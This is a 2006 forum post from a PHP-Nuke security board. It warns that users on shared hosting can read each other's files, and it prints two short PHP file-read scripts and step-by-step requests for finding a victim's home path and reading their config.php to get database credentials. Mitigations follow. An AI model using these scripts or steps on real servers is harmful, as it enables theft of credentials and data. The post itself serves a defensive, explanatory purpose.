You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 48 guest(s) and 2 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Security in shared web servers! be careful: everybody can ha [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

Security in shared web servers! be careful: everybody can ha
 
Post new topic  Reply to topicprinter-friendly view Nuke Cops Forum Index » Nuke Security
View previous topic Log in to check your private messages View next topic
Author Message
sanbad
Nuke Cadet
Nuke Cadet


Joined: May 08, 2006
Posts: 2

Location: Iran
PostPosted: Sun Jul 16, 2006 4:21 am Reply with quoteBack to top
Security in shared web servers! be careful: everybody can hack your portal and db.

Hi

If your php portal install in a shared server you must be careful.
Other user that resident in your server (he has a hosting account on your server)can hack your portal!

How he can hack your portal?

By this script(script 1):

Code:
<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>

And by other one(script 2):

Code:
<?php

    header('Content-Type: text/plain');
    readfile($_GET['a']);

?>


By these scripts , a user that resident in your server, can get your file or your code for exam he can get your config.php and see your database user & pass & name and down your data!!!

1- hacker must know your ID in your hosting so he recall one of php files that belong your portal in his browser:
for exam:
Code:
http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=text

after this requesting; he see any error report like this:
Code:
/home/yourID/public_html/forum/includes/functions.php  error 607 in line 563
Now he find your ID

2- Now he use one of these script for exam script 1 like in this case:
Code:
http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php

then he watch page source and read your db config informations!

3- by using a simple script he can download your db or he can write in your db and …
he can install the same portal and edit and change some code then he can use your encrypted-admin-password and login some times and…

how we can solve this problem?

1- we must add this codes to prologue of all php files:
Code:
 ini_set('display_errors', 'Off');
    ini_set('log_errors', 'On');

so hacker can not find your ID. And you can see error-log in Cpanel of your linux hosting.

2- You must rename your config.php file and edit all php file which include or require config.php file. Then you must encrypt these files by using zend-phpencoder or any other encoder programs.
So if a hacker find your ID he will not find your db config file

3- or using a dedicated server only for own.


In phpnuke if using nuke sentinel and IP-trakcer be on then all users' usernames and passwords ( even admin) insert in
Code:
nuke_nsnst_tracked_ips
!!!

So nuke owner or a hacker can see users password.

If you want register in portals you must use different password.
If your password is equal with your other important thing for exam equal with your email pass or domain-panel pass or your bank account hacker or nuke website owner can access that!

In other portals, owner can change scripts codes and find your password.

_________________
www.sanbad.com
Alireza SSE
Find all posts by sanbadView user's profileSend private messageVisit poster's website
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view Nuke Cops Forum Index » Nuke Security
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.169 Seconds - 367 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::